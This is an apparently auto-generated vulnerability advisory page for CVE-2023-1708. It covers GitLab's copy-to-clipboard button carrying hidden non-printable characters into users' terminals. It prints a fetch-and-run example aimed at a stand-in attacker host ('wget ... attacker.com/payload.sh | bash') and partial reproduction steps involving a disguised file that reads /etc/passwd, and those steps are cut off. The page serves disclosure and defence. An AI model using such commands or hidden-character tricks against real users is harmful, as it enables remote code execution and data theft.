CVE-2023-1708
Description
An issue was identified in GitLab CE/EE affecting all versions from 1.0 prior to 15.8.5, 15.9 prior to 15.9.4, and 15.10 prior to 15.10.1 where non-printable characters gets copied from clipboard, allowing unexpected commands to be executed on victim machine.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
GitLab CE/EE copies non-printable characters to clipboard, allowing attackers to inject arbitrary commands when victims paste into terminals.
Vulnerability
GitLab CE/EE versions from 1.0 up to 15.8.4, 15.9.0 to 15.9.3, and 15.10.0 (i.e., before 15.8.5, 15.9.4, and 15.10.1) have a vulnerability where non-printable characters (e.g., ASCII control characters) are not displayed in the web interface but are copied to the clipboard when a user clicks a copy button [1]. This affects the "copy to clipboard" functionality for file contents and other text.
Exploitation
An attacker can craft a file or snippet that contains hidden non-printable characters, making the visible text appear benign while the clipboard content includes malicious commands. When the victim copies the text via the GitLab web interface and pastes it into a terminal, the hidden characters execute arbitrary commands. For example, an attacker could embed a newline or command separator followed by a command like wget -O - http://attacker.com/payload.sh | bash [1].
Impact
Successful exploitation leads to arbitrary command execution on the victim's machine with the user's privileges. This can result in full compromise of the victim's system, data exfiltration, or further lateral movement. The vulnerability is in the clipboard handling, impacting confidentiality, integrity, and availability.
Mitigation
Fixed versions: GitLab 15.8.5, 15.9.4, and 15.10.1 (released on 2023-04-05). Users should upgrade to these or later versions. No workaround is available for affected versions. The issue is not listed on CISA's KEV as of the publication date.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Range: <15.8.5, 15.9.0-15.9.3, 15.10.0
- Range: >=1.0, <15.8.5
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing sanitization of non-printable characters in the clipboard copy functionality allows hidden characters to be transferred to the user's clipboard."
Attack vector
An attacker embeds non-printable characters (e.g., `\xc2\xa0`) into a command displayed in a GitLab markdown field, such as a README or comment. The victim sees a benign command (e.g., `wget -O - https://server/hello.sh | bash`) because the hidden characters are not rendered. When the victim uses GitLab's "copy to clipboard" button and pastes the text into a terminal, the hidden characters are included, causing the shell to interpret a different file name or command, leading to arbitrary command execution [ref_id=1].
Affected code
The vulnerability exists in GitLab's web interface "copy to clipboard" functionality, which is present across the application wherever text can be copied via a button or link. The issue is that non-printable ASCII characters (e.g., `\xc2\xa0`) are copied verbatim without being sanitized or visually represented to the user [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the expected remediation is that non-printable characters must be visually represented to the user in the web interface before copying, or sanitized from the clipboard content [ref_id=1]. The fix should ensure that hidden characters are either stripped or escaped when the "copy to clipboard" button is used, preventing them from being silently transferred to the user's clipboard.
Preconditions
- inputVictim must use GitLab's 'copy to clipboard' button (not manual text selection) to copy the displayed command.
- authAttacker must be able to create or edit markdown content (e.g., README, comments, issues) containing non-printable characters.
- inputVictim must paste the copied text into a shell or terminal that interprets the hidden characters.
Reproduction
1. As attacker, create a file on your server named `hello.sh` with content `echo "hello world"`. 2. Create a file named `hello.sh\xc2\xa0` (containing the non-printable character) with a malicious payload, e.g., `echo 'cat /etc/passwd' > $'hello.sh\xc2\xa0'`. 3. Create a public GitLab repository with a `README.md`. 4. Clone the repo and edit `README.md` to contain: `echo -e $'```bash\nwget -O - https://
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.